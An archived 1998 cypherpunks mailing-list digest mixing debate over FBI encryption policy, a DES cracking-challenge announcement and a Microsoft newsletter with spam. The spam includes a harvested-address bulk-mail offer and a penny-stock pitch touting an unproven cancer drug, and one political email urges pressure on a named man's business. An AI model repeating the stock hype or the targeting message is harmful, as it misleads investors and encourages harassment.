From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: 58577650@bluewin.ch
Date: Sun, 12 Jul 1998 22:34:50 -0700 (PDT)
To: IIIIIOOOOO@mail-gw2adm.rcsntx.swbell.net
Subject: IIIII=Email Advertising?=IIIII
Message-ID: <199807130528.AAA24174@mail-gw2adm.rcsntx.swbell.net>
MIME-Version: 1.0
Content-Type: text/plain


WE REALLY SEND IT !                
         
         * We use remove systems
         * We use addresses recently collected
         * Recently Improved System Produces More Responses

Now offering targeted lists!  10 cents per address, 4000 address minimum.
     
General Mailing :

Only $350 per 1 million. Introductory offer :

Get the first million for only $250 !

" Test Drive " Special !  Try our service for $55, we send 250,000 
of your ads.    
<A HREF="http://209.84.246.162/bmform.htm"> 
Click here to reply back about this offer </A>

Or, type in this address in your web browser if you are not html compatible:
http://209.84.246.162/bmform.htm

Admin
Internet Services
[ This message is not intended for residents in the state of Washington,
screening of addresses has been done to the best of our technical ability.
Per Section 301, Paragraph (a)(2)(C) of S. 1618, further transmissions to you
by the sender of this email may be stopped at no cost to you by using the 
following link:

If you are a Washington resident or otherwise wish to be removed from this
list,  <A HREF="http://209.84.246.162/remove.htm"> 
Click here to go to global remove site if you want your address removed from
mailing </A>







....










From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sat, 11 Jul 1998 23:21:47 -0700 (PDT)
To: cypherpunks@toad.com
Subject: A Note to 'Nobody'
Message-ID: <490d1a8.35a855ce@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


Hey 'Nobody' (tcmay@got.net (Tim May)), you may as well stop sending me all
your junk mail.  Since you've resorted to attempting to get me kicked off of
AOL for responding to individual pieces of it (Cypherpunks, that's a lie.  He
did that attempt in an attempt to get my website kicked off of AOL), I'm
simply deleting everything that comes in from all the anon. remailing services
without reading it.

If you don't have enough guts to put a return address on your mail, obviously,
you aren't worth reading.

Stan,
Stan and the Sequencers
http://members.aol.com/StanSqncrs/




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Global Web Builders <gwb@gwb.com.au>
Date: Sat, 11 Jul 1998 14:33:30 -0700 (PDT)
To: (Recipient list suppressed)
Subject: The Australia/Israel Review list and Jetset Travel
Message-ID: <1.5.4.32.19980711210318.007236b8@gwb.com.au>
MIME-Version: 1.0
Content-Type: text/plain


Dear One Nation supporter in NSW,

It should be noted by One Nation supporters that the man behind the
Australia/Israel Review, Mr Leibler, is one of the men behind Jetset Travel. 

When booking your next holiday trip I would ask you to consider what
Leibler's views are on the publication of the list of the names and Suburbs
of 2000 One Nation members and donors in the Australia/Israel Review.

Mr Leibler said the decision to publish the list of members and donors was
in the interests of "political transparency". He said concerns about privacy
had been met by not publishing full addresses and telephone numbers. 

What Leibler failed to mention is that they published the suburbs that
members live in. Many One Nation members had phone calls from the media -
contacts made directly through the list published by the Australia/Israel
Review. 

The Australia/Israel Review has since shelved plans to publish the names of
One Nation's remaining 8,000 members. Mr Leibler said: "We feel we have made
our point."

Perhaps it is time for One Nation supporters to make their point?

Jetset can be contacted on: info@jetset.com.au 

GWB



Scott Balson





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: StanSqncrs@aol.com
Date: Sun, 12 Jul 1998 04:26:15 -0700 (PDT)
To: cypherpunks@toad.com (coolness)
Subject: Re: A Note to 'Nobody'
Message-ID: <aaf1a3d1.35a89d20@aol.com>
MIME-Version: 1.0
Content-Type: text/plain


In a message dated 7/12/98 2:33:18 AM Central Daylight Time, tcmay@got.net
writes:

<< ... Further proof that AOL is the dumping ground for the incompetent. >>

And Tim expects AOL to listen to his complaint with that at the end of it?
Ha!

Stan




From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Sun, 12 Jul 1998 04:18:45 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: World's dumbest gunslinger/Exclusive: Are her tits real?
Message-ID: <19980712093021.24392.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

CLICK FOR STUFFED: Sunday July 12 1998

<img src=http://stuffed.net/98/7/12/cover.gif
width=300 height=380 border=0 alt='Click Here For STUFFED, The NEW Daily Tabloid
 News And Babes Color Supplement From Eureka!'>

Click here to read it: http://stuffed.net/98/7/12/



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: John Young <jya@pipeline.com>
Date: Sun, 12 Jul 1998 08:38:25 -0700 (PDT)
To: cypherpunks@toad.com
Subject: DirFBI: Danger of Encryption
Message-ID: <199807121538.LAA18345@camel14.mindspring.com>
MIME-Version: 1.0
Content-Type: text/plain


The New York Times, July 12, 1998:

Danger of Encryption

To the Editor:

Re "Privacy in the Digital Age" (editorial, July 6): No law 
enforcement agency is "trying hard to prevent the growing 
use of encryption." But encryption represents a serious 
public safety concern. We are open to any solution that 
recognizes that it is the ability to collect electronic 
evidence that has allowed us to prevent airliners from 
being bombed and to put major drug dealers behind bars.

Key escrow is one possible solution. There are others, and 
certainly a statutory scheme can be devised that will all 
but eliminate any risk of abuse by law enforcement. But if 
we do not allow for court-ordered access, for the first time 
in the history of this country a court order for seizure of 
evidence will be an absolute nullity.

We want to work with industry on a real solution, recognizing 
that those who acquire encryption over the Internet or from 
abroad naively make assumptions about the security it affords. 
We are not fighting encryption, but we know what will happen 
if technology cannot be made to work for law enforcement as 
it works for criminals and terrorists.    

Louis J. FREEH
Dir., Federal Bureau of Investigation
Washington, July 10,1998






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Webroot@ix.netcom.com
Date: Sun, 12 Jul 1998 18:38:01 -0700 (PDT)
To: Webroot@ix.netcom.com
Subject: Cancer Treatment BREAKTHROUGH!!!!
Message-ID: <199807060040.TAA11965@cityatlas.com>
MIME-Version: 1.0
Content-Type: text/plain


DRAMATICALLY EFFECTIVE CANCER 

TREATMENT IN FINAL DEVELOPMENT

FOR SOFT TISSUE CANCERS OF THE

LIVER, BREAST AND LUNGS -  

by a company that just went public last week! 

Now you can participate in the multi-billion
dollar cancer treatment industry by owning 
stock in this company before the "Wall Street
Analysts" discover it. The company is in 
the final stages of researching and 
developing this new drug to help cure soft  
tissue cancers of the liver, breast and lungs.

This company is led by a very distinguished 
team of Cancer Research Specialists who have
studied this disease for the last two decades.
The company holds the worldwide manufacturing
and marketing rights (except for the former
Soviet Union) for this drug. 

The company is called :

NuOncology Labs Inc.

Trading Symbol: NLAB

Trades:   OTC  BB

'NLAB' started trading last Thursday,July 9,
at: $5 15/32

At the market close Friday, July 10, it was:
$6 1/8

Trials are now being conducted on over 200 
human cancer patients with this new drug and
some very important announcements are 
expected to come from NuOncology over the 
next few weeks.

To have complete investor information sent to 
you via e-mail on this innovative new 
pharmaceutical research and development 
company just :

Click Here

You will get back complete information via
e-mail within the next 24 hours on :
  
NuOncology Labs, Inc. 

We profile companies at the time they initially
go public - before they have been discovered 
by 'The Street' and financial media and have 
by that time already doubled or tripled in price.
By requesting additional information on 
NuOncology Labs, Inc., you are also requesting 
a subscription to our newsletter that profiles
emerging new companies. There is no obligation
and absolutely no cost to you. You may 
unsubscribe at any time. 





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Trei Family <trei@ziplink.net>
Date: Sun, 12 Jul 1998 20:19:04 -0700 (PDT)
To: cypherpunks@toad.com
Subject: RSA DES Challenge starting!
Message-ID: <35A989DA.C1246441@ziplink.net>
MIME-Version: 1.0
Content-Type: text/plain


I'd like to remind people that Monday, July 13th,
1998, RSA Data Security is releasing the challenge
data for the next RSA DES Challenge (the brute force
solution of a DES encrypted message).

For more information on this challenge, please see
http://www.rsa.com. The prize stands at 10,000 USD
for the first solution found within 10 days.

If wish to attempt the challenge by yourself, I
reccomend that you look at Svend Mikkelsen's
Bryddes (http://inet.uni2.dk/~svolaf/des.htm),
which is by far the fastest Intel implementation
I know of - considerably better than my own
Deskr.

If you're interested in a joint effort, you could
do worse than look at http://distributed.net. This
group won the RC5-56 and January 1998 DES challenges,
and are currently working on RC5-64. Their clients
will automatically switch over to DES Monday
morning. It looks like they should attain around
86 billion keys/second, which will exhaust the
keyspace in under 10 days. However, only a fraction
of the prize money goes to the person who finds
the key.

Cracking DES in these challenges serves a higher
purpose than winning a prize or gaining bragging
rights.

Single DES (the kind used in this challenge) is the
strongest general purpose encryption which Americans
are currently permitted to send overseas without
special and rarely granted waivers.

As a result, the US government is turning over the
world market in high quality cryptography to
non-US firms, with a cost of billions of dollars a
year to the US economy, thousands of American jobs,
and increased crime and terrorism resulting from the
poor security this policy promotes.

Demonstrating how vulnerable US 'export quality'
encryption actually is creates pressure to remove
those restrictions entirely.

I regard this as a desirable goal.

Peter Trei
trei@ziplink.net






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: Xcott Craver <caj@math.niu.edu>
Date: Sun, 12 Jul 1998 22:22:33 -0700 (PDT)
To: cypherpunks@toad.com
Subject: Re: DirFBI: Danger of Encryption
In-Reply-To: <199807121538.LAA18345@camel14.mindspring.com>
Message-ID: <Pine.SUN.3.91.980713001437.3108A-100000@baker>
MIME-Version: 1.0
Content-Type: text/plain


On Sun, 12 Jul 1998, John Young wrote:

> The New York Times, July 12, 1998:
>
	[...]
 
> but eliminate any risk of abuse by law enforcement. But if 
> we do not allow for court-ordered access, for the first time 
> in the history of this country a court order for seizure of 
> evidence will be an absolute nullity.

	This is an interesting claim.  Surely it's only been
	in this century that law enforcement has ever had 
	the kind of systematic access to communication that presently
	does.  I'd say Louis Freeh is lacking in the history department
	if he really believes that Americans have never possessed
	as much privacy as strong crypto offers.

	I'd also say he's missed a few history classes if he 
	thinks that the world will blow up without him listening
	in.

							-Xcott





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: STUFFED/EUREKA! <stuffed@stuffed.net>
Date: Mon, 13 Jul 1998 04:38:55 -0700 (PDT)
To: All Eureka/Stuffed Subscribers: ;
Subject: Woman saved by sex/Dog chewed my balls off
Message-ID: <19980713092147.6142.qmail@eureka.abc-web.com>
MIME-Version: 1.0
Content-Type: text/html

Click for STUFFED: Monday July 13 1998


<img src=http://stuffed.net/98/7/13/cover.gif width=300
height=380 border=0 alt='Click here for STUFFED, the new daily
 tabloid news, humor and babes newspaper from Eureka!'>

This is a combined text/html email. If your email client can
display html web pages  you probably won't see this text but
should see the front cover of today's issue above, which you
should  click on to read.  If you cannot see the cover, your
email client either cannot display html or its' options have
been set to  ignore html images.  In which case,  please ...
Click here to read today's! --> http://stuffed.net/98/7/13/

This  email  is  never  sent  unsolicited.  Stuffed  is  the
supplement for the Eureka newsletter you subscribed to. Full
instructions on unsubscribing  are in every issue of Eureka!



From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: tne1870@hotmail.com
Date: Mon, 13 Jul 1998 09:33:31 -0700 (PDT)
Subject: Pre-Press Pre-Owned Equipment
Message-ID: <eaep.3.0.reg.JohEGQ.35989.3975778935@mail.pe.net>
MIME-Version: 1.0
Content-Type: text/plain



INFORMATION ONLY:
The Pre-Press Brokerage Company brokers used pre-press
equipment for the printing industry.

Our web address:          http://www.pe.net/~pbc

Our e-mail address:        pbc@pe.net

You may call:   909.686.2875

Thank you for your consideration.

Geoff McPartlin, Sales Director





From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "William H. Geiger III" <whgiii@invweb.net>
Date: Mon, 13 Jul 1998 08:22:46 -0700 (PDT)
To: "Paul H. Merrill" <paulmerrill@acm.org>
Subject: Re: DirFBI: Danger of Encryption
In-Reply-To: <35AA4A36.1EB56250@acm.org>
Message-ID: <199807131528.KAA013.84@geiger.com>
MIME-Version: 1.0
Content-Type: text/plain


-----BEGIN PGP SIGNED MESSAGE-----

In <35AA4A36.1EB56250@acm.org>, on 07/13/98 
   at 10:56 AM, "Paul H. Merrill" <paulmerrill@acm.org> said:

>Actually, his statement was interesting and a masterpiece.  While it is
>true that the access to communications is recent, the court orders for
>evidence have been around.  What he "failed to mention" was that they
>have access currently which is unheard of in the past and that it is only
>that slice of life that would have "absolute nullity".

>Gee, don't they teach Propoganda 101 anymore?

Sure they do, it's part of the on the job training for all government
employees.

- -- 
- ---------------------------------------------------------------
William H. Geiger III  http://users.invweb.net/~whgiii
Geiger Consulting    Cooking With Warp 4.0

Author of E-Secure - PGP Front End for MR/2 Ice
PGP & MR/2 the only way for secure e-mail.
OS/2 PGP 5.0 at: http://users.invweb.net/~whgiii/pgp.html
- ---------------------------------------------------------------
 
Tag-O-Matic: Dos: Venerable.  Windows: Vulnerable.  OS/2: Viable.

-----BEGIN PGP SIGNATURE-----
Version: 2.6.3a-sha1
Charset: cp850
Comment: Registered_User_E-Secure_v1.1b1_ES000000

iQCVAwUBNaonpY9Co1n+aLhhAQEgMAQAy+xSgY6m3cAS4M3ccqqNgGYA4uuSBNE6
Ik4SzG+GW2I0whBcqcS4hICPCgTKIMqDFvZ6dL2MLnV2HeFnpgwhVyAETa/Sd7rj
CwEDiUqw38rUzUmahjFR1VWBqe90SjWBklLSMlcwIoigreV5QusutU4izadnmD0e
jKO+VzFu15U=
=P8VS
-----END PGP SIGNATURE-----






From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Paul H. Merrill" <paulmerrill@acm.org>
Date: Mon, 13 Jul 1998 07:48:21 -0700 (PDT)
To: Xcott Craver <caj@math.niu.edu>
Subject: Re: DirFBI: Danger of Encryption
In-Reply-To: <Pine.SUN.3.91.980713001437.3108A-100000@baker>
Message-ID: <35AA4A36.1EB56250@acm.org>
MIME-Version: 1.0
Content-Type: text/plain


Actually, his statement was interesting and a masterpiece.  While it is
true that the access to communications is recent, the court orders for
evidence have been around.  What he "failed to mention" was that they have
access currently which is unheard of in the past and that it is only that
slice of life that would have "absolute nullity".

Gee, don't they teach Propoganda 101 anymore?

PHM

Xcott Craver wrote:

> On Sun, 12 Jul 1998, John Young wrote:
>
> > The New York Times, July 12, 1998:
> >
>         [...]
>
> > but eliminate any risk of abuse by law enforcement. But if
> > we do not allow for court-ordered access, for the first time
> > in the history of this country a court order for seizure of
> > evidence will be an absolute nullity.
>
>         This is an interesting claim.  Surely it's only been
>         in this century that law enforcement has ever had
>         the kind of systematic access to communication that presently
>         does.  I'd say Louis Freeh is lacking in the history department
>         if he really believes that Americans have never possessed
>         as much privacy as strong crypto offers.
>
>         I'd also say he's missed a few history classes if he
>         thinks that the world will blow up without him listening
>         in.
>
>                                                         -Xcott







From cypherpunks@MHonArc.venona  Wed Dec 17 23:17:14 2003
From: "Support Online Staff" <SupportOnlineStaff_000926@news.newswire.microsoft.com>
Date: Mon, 13 Jul 1998 11:31:29 -0700 (PDT)
To: <cypherpunks@toad.com>
Subject: Developer Support News Watch - July 13, 1998
Message-ID: <199807131831.LAA05698@toad.com>
MIME-Version: 1.0
Content-Type: text/plain


Developer Support News Watch
============================
As a subscriber to Developer Support News Watch, you receive e-mail
twice each month that highlights some of the new articles recently
published on Support Online, Microsoft's award-winning technical support
web site.  

Table of Contents
=================
(1) Announcements
(2) New Knowledge Base Articles
(3) Requesting Articles via E-Mail
(4) Developer Product FAQs & Support Resources
(5) Additional Resources

(1) Announcements

Integrated Solutions: Microsoft Business Applications Conference 98
-------------------------------------------------------------------
At the Microsoft Business Applications Conference, the content will 
be technical, but the focus will be on how you can build the best 
integrated solutions for your most common business problems. 
Sign up today -- see http://www.microsoft.com/events/bizapps/

Southern California Developers
------------------------------
Attention all Developers in Southern California <http://www.microsoft.com/socal>:
On July 21 & 22, attend the FREE Microsoft TechNet Quarterly Briefing and 
gain the know-how to implement the latest technology. Keynote on the Windows 
desktop plus a developer must: the Developer Track covering Windows DNA and 
3-tier app development.  Use VIP CODE LSMTS.

New Features Make Finding Your Answers on Support Online Even Easier
--------------------------------------------------------------------
Support Online recently released a number of new features to make it 
even easier to find the answers you need. The following highlights some of 
the enhancements you'll see on Support Online at http://support.microsoft.com/.

For information about how to use these new Support Online features, see 
http://support.microsoft.com/support/howto/.

- Specify an article ID number. If you know the ID number of the 
  Knowledge Base article you want, you can enter the ID number 
  to find that specific article.

- Search for troubleshooting tools. Now you can customize your 
  search to include troubleshooting tools only.

- Search for specific drivers and other downloadable files. If you
  know the name of the driver or download file you want, enter the
  full file name to find the file on Support Online. 

- See what's new. If you want to see the latest information about 
  a product and/or a topic, use the What's New option and select 
  the number of days you want to review. You can select 1, 3, 7, 
  14, or 30 days.  

- Toggle between Advanced View and Basic View. Advanced View 
  offers additional search options and other features. Now you 
  can easily toggle between Advanced View and Basic View.

Need help using these features? See http://support.microsoft.com/support/howto/.


(2) New Knowledge Base Articles
===============================
In addition to the FAQ documents mentioned below, the 
following articles were recently updated in the Microsoft Knowledge Base:

ActiveX Data Objects 
--------------------
PRB: Decimal Values Passed to a Stored Procedure Get Truncated (Q188574)
  http://support.microsoft.com/support/kb/articles/Q188/5/74.asp

ActiveX SDK 
-----------
INFO: Internet Explorer designMode Property Is Not Supported (Q188864)
  http://support.microsoft.com/support/kb/articles/Q188/8/64.asp

Active Server Pages 
-------------------
PRB: Request.ServerVariables("LOGON_USER") Returns Empty String (Q188717)
  http://support.microsoft.com/support/kb/articles/Q188/7/17.asp
PRB: Implements Keyword Fails in VB DLL called from ASP (Q188716)
  http://support.microsoft.com/support/kb/articles/Q188/7/16.asp
HOWTO: Change Information in a Database from ASP (Q188713)
  http://support.microsoft.com/support/kb/articles/Q188/7/13.asp

Automation/VBA
--------------
BUG: Starting Word Manually Uses Same Instance as Automation (Q188546)
  http://support.microsoft.com/support/kb/articles/Q188/5/46.asp

Internet Development 
--------------------
PRB: The File Upload Control Cannot Publish Your Files (Q188953)
  http://support.microsoft.com/support/kb/articles/Q188/9/53.asp
BETA-INFO: DHTML Behaviors Limited to One Per HTML Element (Q188866)
  http://support.microsoft.com/support/kb/articles/Q188/8/66.asp
PRB: Forms 2.0 CommandButton Fires Click Event When Disabled (Q188766)
  http://support.microsoft.com/support/kb/articles/Q188/7/66.asp
BETA-PRB: Type Mismatch for Document.parentWindow (Q188764)
  http://support.microsoft.com/support/kb/articles/Q188/7/64.asp
BUG: document.readyState Not in Sync with Download in IFrame (Q188763)
  http://support.microsoft.com/support/kb/articles/Q188/7/63.asp
HOWTO: Show Web Page Source from a Hyperlink (Q188762)
  http://support.microsoft.com/support/kb/articles/Q188/7/62.asp

Java
----
BUG: KEY_PRESSED Event Not Generated for Some Controls (Q188808)
  http://support.microsoft.com/support/kb/articles/Q188/8/08.asp
FIX: Setting Colors for List/Choice Control Fails (Q188448)
  http://support.microsoft.com/support/kb/articles/Q188/4/48.asp
FIX: AFC Deadlock May Occur When Setting UIFrame's Cursor. (Q188446)
  http://support.microsoft.com/support/kb/articles/Q188/4/46.asp

MAPI Programming 
----------------
HOWTO: Use BatchExport to Specify Which Attributes to Export (Q188960)
  http://support.microsoft.com/support/kb/articles/Q188/9/60.asp
PRB: Error 2001 Linking Simple MAPI Applications (Q188959)
  http://support.microsoft.com/support/kb/articles/Q188/9/59.asp
INFO: Possible Causes for Memory Leaks in MAPI Clients/Providers (Q188958)
  http://support.microsoft.com/support/kb/articles/Q188/9/58.asp
PRB: Transport Causes MAPI Spooler to Shutdown Unexpectedly (Q188653)
  http://support.microsoft.com/support/kb/articles/Q188/6/53.asp
PRB: CDO Rendering Library Not Available Outside of ASP (Q188599)
  http://support.microsoft.com/support/kb/articles/Q188/5/99.asp
HOWTO: Open the Global Profile Section (Q188482)
  http://support.microsoft.com/support/kb/articles/Q188/4/82.asp

Mastering Series 
----------------
PRB: Troubleshooting Active Movie Problems in Mastering Series (Q188660)
  http://support.microsoft.com/support/kb/articles/Q188/6/60.asp
PRB: Marisa.dll Causes Movie Clip Errors in Mastering Series (Q188445)
  http://support.microsoft.com/support/kb/articles/Q188/4/45.asp

ODBC Programming 
----------------
PRB: Stored Procedure Invocation Returns "Protocol Error in TDS" (Q188558)
  http://support.microsoft.com/support/kb/articles/Q188/5/58.asp
Internet Scripting Languages 
HOWTO: Use Internet Transfer Control in ASP or in WSH Script (Q188955)
  http://support.microsoft.com/support/kb/articles/Q188/9/55.asp

Visual Basic 
------------
BUG: Incorrect Localized Strings Display in the Visual Basic IDE (Q189056)
  http://support.microsoft.com/support/kb/articles/Q189/0/56.asp
PRB: ITC Cannot Perform ASCII-type FTP Transfer (Q188956)
  http://support.microsoft.com/support/kb/articles/Q188/9/56.asp
HOWTO: Use the Remote Data Control to Pass Bookmarks (Q188861)
  http://support.microsoft.com/support/kb/articles/Q188/8/61.asp
FILE: VB5SP3DS.EXE Contains Visual Basic SP3 Debugging Symbols (Q188588)
  http://support.microsoft.com/support/kb/articles/Q188/5/88.asp
HOWTO: Expedite the Visual Basic Support Process (Q188586)
  http://support.microsoft.com/support/kb/articles/Q188/5/86.asp
BUG: UserControl's ContainedControls Do Not Inherit ScaleMode (Q188552)
  http://support.microsoft.com/support/kb/articles/Q188/5/52.asp
INFO: Visual Basic Requirements for Using Exported DLLs (Q188541)
  http://support.microsoft.com/support/kb/articles/Q188/5/41.asp

Visual C++ 
----------
BUG: Calling CHttpFile::ErrorDlg Function Causes Errors 127 & 2 (Q189094)
  http://support.microsoft.com/support/kb/articles/Q189/0/94.asp
BUG: Step 2 of the MFC AppWizard Does Not Set Macro Values (Q189073)
  http://support.microsoft.com/support/kb/articles/Q189/0/73.asp
PRB: WinDBG for WinCe 2.0 Does Not Support Named Pipes (Q189036)
  http://support.microsoft.com/support/kb/articles/Q189/0/36.asp
HOWTO: VC++ MFC Client for the ComCallingJava Sample (Q188817)
  http://support.microsoft.com/support/kb/articles/Q188/8/17.asp
BUG: AV Using ios-Derived Type in Multithreaded Apps (Q188721)
  http://support.microsoft.com/support/kb/articles/Q188/7/21.asp
PRB: Error Executing ~vcecho!Compiling (Q188720)
  http://support.microsoft.com/support/kb/articles/Q188/7/20.asp
BUG: Error C1083 Building Large Projects with Browse Info (Q188708)
  http://support.microsoft.com/support/kb/articles/Q188/7/08.asp
INFO: Visual C++ and the Year 2000, Years that Cause an Overflow (Q188707)
  http://support.microsoft.com/support/kb/articles/Q188/7/07.asp
BUG: Memory Leak with Jet 3.51 and Remote ODBC Data Sources (Q188579)
  http://support.microsoft.com/support/kb/articles/Q188/5/79.asp

Visual FoxPro 
-------------
HOWTO: Determine the Operating System Build Number (Q188987)
  http://support.microsoft.com/support/kb/articles/Q188/9/87.asp
HOWTO: Use the Win32 API to Access File Dates and Times (Q188977)
  http://support.microsoft.com/support/kb/articles/Q188/9/77.asp
HOWTO: Setting the System Date and Time Programmatically (Q188897)
  http://support.microsoft.com/support/kb/articles/Q188/8/97.asp
BUG: "String is too long to fit" Error Passing Variables to COM (Q188888)
  http://support.microsoft.com/support/kb/articles/Q188/8/88.asp
PRB: "Cannot Open File" Message Building FoxPro 2.6 Project (Q188536)
  http://support.microsoft.com/support/kb/articles/Q188/5/36.asp
HOWTO: Sharing Data Between Processes Using Memory-Mapped Files (Q188535)
  http://support.microsoft.com/support/kb/articles/Q188/5/35.asp
HOWTO: Use API Calls to Detect Other Running Applications (Q188404)
  http://support.microsoft.com/support/kb/articles/Q188/4/04.asp
HOWTO: Modify Report Fields Programmatically (Q188403)
  http://support.microsoft.com/support/kb/articles/Q188/4/03.asp
PRB: ACCESS Cannot Import/Link Table if Index Contains Function (Q188401)
  http://support.microsoft.com/support/kb/articles/Q188/4/01.asp

Visual InterDev
---------------
BUG: Executing "SP_PrimaryKey" results in no primary key (Q188719)
  http://support.microsoft.com/support/kb/articles/Q188/7/19.asp
HOWTO: Troubleshoot IUSR_machine Permissions Problem (Q188712)
  http://support.microsoft.com/support/kb/articles/Q188/7/12.asp

Win32 SDK 
---------
HOWTO: Programmatically Trigger a SNMP Trap (Q189131)
  http://support.microsoft.com/support/kb/articles/Q189/1/31.asp
FIX: ICMP API Header & Library Files Missing from Windows CE (Q189120)
  http://support.microsoft.com/support/kb/articles/Q189/1/20.asp
HOWTO: Create Context-Sensitive HTML Help in a Visual Basic App (Q189086)
  http://support.microsoft.com/support/kb/articles/Q189/0/86.asp
HOWTO: Use the SetupAPI's SetupIterateCabinet() Function (Q189085)
  http://support.microsoft.com/support/kb/articles/Q189/0/85.asp
HOWTO: Create a Tri-pane Window with HTML Help Workshop (Q189084)
  http://support.microsoft.com/support/kb/articles/Q189/0/84.asp
BUG: LoadPerfCounterTextString Fails with Error 87 (Q188769)
  http://support.microsoft.com/support/kb/articles/Q188/7/69.asp
INFO: Working with the FILETIME Structure (Q188768)
  http://support.microsoft.com/support/kb/articles/Q188/7/68.asp
HOWTO: Specify Access Control on Window NT Container Objects (Q188760)
  http://support.microsoft.com/support/kb/articles/Q188/7/60.asp
INFO: UserDomain Method Does Not Work Under Win95 with WSH (Q188602)
  http://support.microsoft.com/support/kb/articles/Q188/6/02.asp
BUG: ADSI NDS Provider Does Not Support Extension of NDS Schema (Q188510)
  http://support.microsoft.com/support/kb/articles/Q188/5/10.asp
BUG: Editing MAP or ALIAS in the HTML Help Workshop Causes Error (Q188444)
  http://support.microsoft.com/support/kb/articles/Q188/4/44.asp


(3) Requesting articles via e-mail
==================================

You can also receive these articles (and others) in e-mail by sending a message to mshelp@microsoft.com. In the Subject line of your message, enter the Article-ID number (Qnnnnnn). For example to receive Q162721, your Subject line should resemble the following example:

   Subject: Q162721

You can have multiple articles sent to you in e-mail by typing multiple Article-ID numbers separated by a comma. For example:

   Subject: Q178049, Q174914, Q174062

To receive an index of articles, enter "Index" (without quotation marks) in the Subject line. For example: 

   Subject: Index

The MSHelp Index is updated monthly. For more information about MSHelp, see http://support.microsoft.com/support/kb/articles/q183/1/21.asp.

Visit Support Online
--------------------

We also encourage you to visit Support Online at http://support.microsoft.com/support/ to see our complete selection of helpful articles designed to answer questions about using Microsoft products.

(4) Developer Product FAQs & Support Resources
==============================================
Here's some highlights and pointers to the latest information on 
Microsoft Developer Tools:

Visual Studio Service Pack Released: Visual Studio 97 Service Pack 3 
contains bug fixes for many tools, and is now available for developers 
who use any of the Visual Studio tools. See 
http://www.microsoft.com/vstudio/sp/ for the latest information.

Visual BASIC Frequently Asked Questions:
For pointers to the latest Visual BASIC FAQ's, see
http://support.microsoft.com/support/vbasic/faq/default.asp

Visual C++ 5.0 (Professional & Enterprise) 
Frequently Asked Questions - FAQ (Q167654), see
http://support.microsoft.com/support/kb/articles/Q167/6/54.asp

Visual FoxPro 5.0 Frequently Asked Questions (FAQ), see
http://support.microsoft.com/support/vfoxpro/content/faq
/vfoxpro/vfp50win/default.asp

Visual J++ Frequently Asked Questions - FAQ (Q169173), see
http://support.microsoft.com/support/kb/articles/Q169/1/73.asp

Visual InterDev Troubleshooting Guide:
Look through this guide to help you quickly troubleshoot and overcome
the most common technical issues you may encounter when first setting up
your Microsoft Visual InterDev working environment.
See http://support.microsoft.com/support/vinterdev/content/tsguide.asp

Microsoft SourceSafe Frequently Asked Questions (FAQ) (Q134369), see
http://support.microsoft.com/support/kb/articles/Q134/3/69.asp

Microsoft Developer Support Messaging Frequently Asked Questions (FAQ)
http://support.microsoft.com/support/messagingsdk/faq/default.asp

Multimedia Sample Projects:
Add multimedia functionality to your Visual Basic program by using the
techniques in these Visual Basic sample projects. See
http://support.microsoft.com/support/vbasic/vbmm.asp

Active Template Library (ATL) Frequently Asked Questions (Q166480), see
http://support.microsoft.com/support/kb/articles/Q166/4/80.asp

Popular MFC Samples--created by support engineers for MFC developers.
See http://support.microsoft.com/support/visualc/atlmfc/samples.asp

OLE Automation Using MFC
For the latest articles about automating Microsoft Office 97 components
using the Microsoft Foundation Classes (MFC), see
http://support.microsoft.com/support/visualc/atlmfc/oleatmfc.asp

VBA Software Development Kit Frequently Asked Questions - FAQ (Q170298) 
http://support.microsoft.com/support/kb/articles/Q170/2/98.asp

COM Security Frequently Asked Questions - FAQ (Q158508), see 
http://support.microsoft.com/support/kb/articles/Q158/5/08.asp

ADC 1.0 FAQ Available for Download (Q165292), see
http://support.microsoft.com/support/kb/articles/Q165/2/92.asp
Or download directly from:
http://support.microsoft.com/download/support/mslfiles/ADC10FAQ.EXE

Visual Modeler 1.0 Frequently Asked Questions (FAQ)(Q166395), see
http://support.microsoft.com/support/kb/articles/Q166/3/95.asp

ActiveX Data Objects (ADO) Frequently Asked Questions (Q183606) 
http://support.microsoft.com/support/kb/articles/Q183/6/06.asp 

Microsoft Internet Finance Server Toolkit (MIFST) Frequently Asked 
Questions (Q182448) 
http://support.microsoft.com/support/kb/articles/Q182/4/48.asp 

Developing with the ActiveX SDK - FAQ (Q158264), see 
http://support.microsoft.com/support/kb/articles/Q158/2/64.asp 

Developing with the Internet Client SDK - FAQ (Q167435), see 
http://support.microsoft.com/support/kb/articles/Q167/4/35.asp

SDK for Java Frequently Asked Questions - FAQ (Q168942), see
http://support.microsoft.com/support/kb/articles/Q168/9/42.asp

Microsoft SDK for Java Release:
Go to this page to download the latest released Microsoft SDK for 
Java (2.02), which contains the Java VM from IE 4.01, support 
for JDK 1.1, J/Direct, AFC, samples, the latest Java compiler, 
and documentation.  See http://www.microsoft.com/java/download.htm

The latest Microsoft VM for Java: Easily upgrade to the latest VM, 
See http://www.microsoft.com/java/vm/dl_vmsp2.htm

Java/COM/DCOM Frequently Asked Questions - FAQ (Q168935), see
http://support.microsoft.com/support/kb/articles/Q168/9/35.asp

CAB Files Frequently Asked Questions - FAQ (Q168941), see
http://support.microsoft.com/support/kb/articles/Q168/9/41.asp

AFC Frequently Asked Questions - FAQ (Q168943) 
http://support.microsoft.com/support/kb/articles/Q168/9/43.asp


(5) Additional Resources
========================
In addition, the following resources might prove helpful:

Check out the MSDN "Buzz" for the latest information on Microsoft's
